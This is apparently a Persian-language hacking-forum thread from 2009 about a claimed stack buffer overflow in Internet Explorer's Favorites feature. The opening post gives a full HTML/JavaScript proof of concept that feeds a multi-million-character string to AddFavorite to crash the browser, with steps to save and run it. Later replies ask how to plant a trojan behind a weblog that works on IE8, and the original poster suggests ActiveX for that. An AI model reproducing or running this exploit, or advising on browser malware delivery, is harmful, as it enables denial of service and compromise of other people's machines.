امتیاز موضوع:
  • 1 رأی - میانگین امتیازات: 1
  • 1
  • 2
  • 3
  • 4
  • 5
حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
نویسنده پیام
IISecurity.C آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 245
موضوع‌ها: 41
تاریخ عضویت: بهمن ۱۳۸۶

تشکرها : 70
( 270 تشکر در 112 ارسال )
ارسال: #1
حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
این حفره امنیتی که از نوع Stack Buffer Overflow میباشد و در بخش :
Favourites وجود دارد که هکر با دادن یک ادرس با , میتواند موجب کرش کردن مرورگر شود :
کد:
('http://'+str,'Crash')
یک فایل متنی باز کرده و متن زیر را کپی کنید :

کد:
<html>
<head>
<script language="javascirpt" type="Text/javascirpt">
function go()
{
    var str =unescape('%u4141');
    var finalstr = createInlineBuffer(str, 5150000);
    var len = finalstr.length;
    document.write(len);
    addfav(finalstr);
}
              
/* Effient in-line creation */
function createInlineBuffer (str, num) {
    var i = Math.ceil(Math.log(num) / Math.LN2);
        res = str;
    do {
        res += res;
    } while (0 < --i);
    return res.slice(0, str.length * num);
}

/* Vulnerable Function */
function addfav(str)
   {
   if (document.all)
      {
      window.external.AddFavorite
      ('http://'+str,'Crash')
      }
   }
</script>
</head>
<body>
<a href="javascirpt:go()">Add To Favorites</a>
</body>
</html>

با پسوند html یا html ذخیره کرده با IE باز کنید
حالا کافیه روی Add To Favorites کلیک کنید
سوالی بود بپرسید

خداوند بی نهایت است اما بقدر نیاز تو فرود می اید
بقدر ارزوی تو گسترده میشود
و بقدر ایمان تو کارگشاست
(آخرین ویرایش در این ارسال: ۲۱-تير-۱۳۸۸, ۰۳:۰۷:۰۲، توسط amirjan.)
۲۰-تير-۱۳۸۸, ۱۵:۰۴:۴۸
ارسال‌ها
پاسخ
تشکر شده توسط : Mr.pRoGraMmer, mahdi20, t3r!p3000
Mr.pRoGraMmer غایب
کاربر با تجربه
****

ارسال‌ها: 1,084
موضوع‌ها: 58
تاریخ عضویت: اسفند ۱۳۸۷

تشکرها : 2031
( 2927 تشکر در 1008 ارسال )
ارسال: #2
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
سلام
ببخشید یه سوال داشتم میشه پشت وبلاگ تروجان گذاشت و روی مرورگر اینترنت اکسپلور 8 هم جواب بده تا حالا واسه اینترنت اکسپلور 8 نتونستم شما میتونید کاری کنید که رو اینترنت اکسپلور 8 جواب بده؟

۲۰-تير-۱۳۸۸, ۱۵:۰۸:۳۷
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : t3r!p3000
IISecurity.C آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 245
موضوع‌ها: 41
تاریخ عضویت: بهمن ۱۳۸۶

تشکرها : 70
( 270 تشکر در 112 ارسال )
ارسال: #3
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
قبلا یه بار توضیح دادم .الانم فعلا دارم روی فایرفاکس کار میکنم متاسفانه موقع دانلود اررور میده اگه بر طرفش کنم میرم سراغ IE ولی بهترین راه اکتیو ایکس توصیه میکنم اکتیو اکس های نسخه های قبل رو مطالعه کنی مثل 7

خداوند بی نهایت است اما بقدر نیاز تو فرود می اید
بقدر ارزوی تو گسترده میشود
و بقدر ایمان تو کارگشاست
۲۰-تير-۱۳۸۸, ۲۳:۰۳:۲۲
ارسال‌ها
پاسخ
تشکر شده توسط : mahdi20, t3r!p3000
babyy آفلاین
بازنشسته
*****

ارسال‌ها: 3,095
موضوع‌ها: 141
تاریخ عضویت: مرداد ۱۳۸۷

تشکرها : 35081
( 26090 تشکر در 9068 ارسال )
ارسال: #4
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
سلام

واسه من کرش نشدا !!!
ie هشت هستش ، ولی چیزی نشد
----------------------------
یه سوال !!
کرش به چه دردی میخوره ؟؟
مرورگر هنگ میکنه ، بدش بسته میشه ، چطور میشه از کرش به نفع خودمون استفاده کنیم ؟؟؟

یه توضیح بدید سپاسگزارم.
۲۱-تير-۱۳۸۸, ۰۲:۰۴:۳۷
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : mahdi20, t3r!p3000
amirjan آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 1,105
موضوع‌ها: 24
تاریخ عضویت: تير ۱۳۸۳

تشکرها : 348
( 697 تشکر در 251 ارسال )
ارسال: #5
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
سلام .
اول اینکه با اجازه آقای IISecurity.C من پست اول رو ویرایش کردم .
بدنه اصلی exploit رو توی تگ code قرار دادم تا خوانا تر بشه .
و یک نکته دیگه رو هم به دوستان یاد آوار بشم : به دلیل جلوگیری از بروز حملاتی نظیر XSS اجازه استفاده از کلمه "جاوا اسکریپت" به صورت لاتین ، در پست ها رو ندارید . دوستان توجه کنن که جای حروف r و i در کلمه "جاوا اسکریپت" با هم عوض شدن . ممکنه در اجرای کد به مشکل بر بخورید .

و اما درباره آسیب پذیری Stack Buffer Overflow باید بگم که لزوما این باگ باعث crash کردن نرم افزار نمیشه . استفاده ی اصلی هکر ها از این قبیل باگ ها ، دسترسی به مکان های غیر مجاز حافظه هست . برای اطلاعات بیشتر به ویکی پدیا رجوع کنید .

سید امیر حسین حسنینی

Human knowledge belongs to the world ...
۲۱-تير-۱۳۸۸, ۰۳:۱۶:۴۷
ارسال‌ها
پاسخ
تشکر شده توسط : t3r!p3000, mahdi20, Darg, hamed_Arfaee, lord_viper, saeedsmk, dll, IISecurity.C, Mr.pRoGraMmer, Salivan, babyy
IISecurity.C آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 245
موضوع‌ها: 41
تاریخ عضویت: بهمن ۱۳۸۶

تشکرها : 70
( 270 تشکر در 112 ارسال )
ارسال: #6
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
این حملات بیشتر برای جلو گیری از فعالیت و یا از کار انداختن و کلا اختلال در سیستم ها مورد استفاده قرار میگیره (البته با حملات ترکیبی میتوان دسترسی گرفت ) مانند از کار انداختن فایروال و ...

خداوند بی نهایت است اما بقدر نیاز تو فرود می اید
بقدر ارزوی تو گسترده میشود
و بقدر ایمان تو کارگشاست
۲۱-تير-۱۳۸۸, ۱۵:۵۸:۵۷
ارسال‌ها
پاسخ
تشکر شده توسط : babyy, t3r!p3000
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #7
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
سلام.
کسپر جلوش رو گرفت. فکر میکنم به خاطر کد جاوا اسکریپتشه.
۲۲-تير-۱۳۸۸, ۰۳:۵۲:۲۲
ارسال‌ها
پاسخ
IISecurity.C آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 245
موضوع‌ها: 41
تاریخ عضویت: بهمن ۱۳۸۶

تشکرها : 70
( 270 تشکر در 112 ارسال )
ارسال: #8
RE: حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)
خوبی کسپر به اینه که راحت سورس رو پویش میکنه .البته سورس رو بهش شناسوندن چون موردی نداره که بخواد الگویی گیر بده

خداوند بی نهایت است اما بقدر نیاز تو فرود می اید
بقدر ارزوی تو گسترده میشود
و بقدر ایمان تو کارگشاست
۲۲-تير-۱۳۸۸, ۱۱:۰۹:۲۲
ارسال‌ها
پاسخ
تشکر شده توسط : t3r!p3000


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  حفره امنیتی خطرناک در اینترنت اکسپلورر 10 شاید 11 !! Ghoghnus 3 4,482 ۲۹-اردیبهشت-۱۳۹۳, ۰۸:۳۵:۵۷
آخرین ارسال: aKaReZa75
  دور زدن UAC در تمام نسخه‌های ویندوز godvb 0 2,465 ۱۳-فروردین-۱۳۹۳, ۲۱:۴۵:۳۳
آخرین ارسال: godvb
  گروه امنیتی آشیانه هک شد ! NabiKAZ 36 37,802 ۲۲-فروردین-۱۳۹۱, ۰۰:۱۸:۱۱
آخرین ارسال: sharin
  کشف اسیب پذیری امنیتی در سرویس های بلاگفا و میهن بلاگ بهمراه اموزش IISecurity.C 3 5,121 ۱۴-آذر-۱۳۸۹, ۱۱:۳۱:۵۱
آخرین ارسال: IISecurity.C
  عبور از سد امنیتی چیپ ستهایTPM lord_viper 1 3,011 ۲۳-بهمن-۱۳۸۸, ۱۵:۴۵:۵۵
آخرین ارسال: Scorpion
Exclamation بوت کنید بدون نرم افزار / حتی یاهو 8 / جدید *** Soheilvb 11 16,116 ۲۲-بهمن-۱۳۸۸, ۱۵:۱۲:۳۱
آخرین ارسال: ARASH.XP
  بایندر جدید و بروز IISecurity.C 2 3,295 ۲۴-آبان-۱۳۸۸, ۱۱:۰۶:۵۶
آخرین ارسال: Mr.pRoGraMmer
Cool کارت اینترنت مجانی mahyar 69 6 12,891 ۳۰-مرداد-۱۳۸۸, ۲۱:۱۱:۴۰
آخرین ارسال: dreamvbfox
  گرفتن Data از اینترنت بدون اجازه کاربر arian_vc 17 14,839 ۱۱-اسفند-۱۳۸۷, ۲۰:۴۲:۴۶
آخرین ارسال: Behrooz1441
  هک اینترنت در LAN mri_6889 1 5,643 ۰۵-اسفند-۱۳۸۷, ۱۳:۲۴:۵۸
آخرین ارسال: faridbardia

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS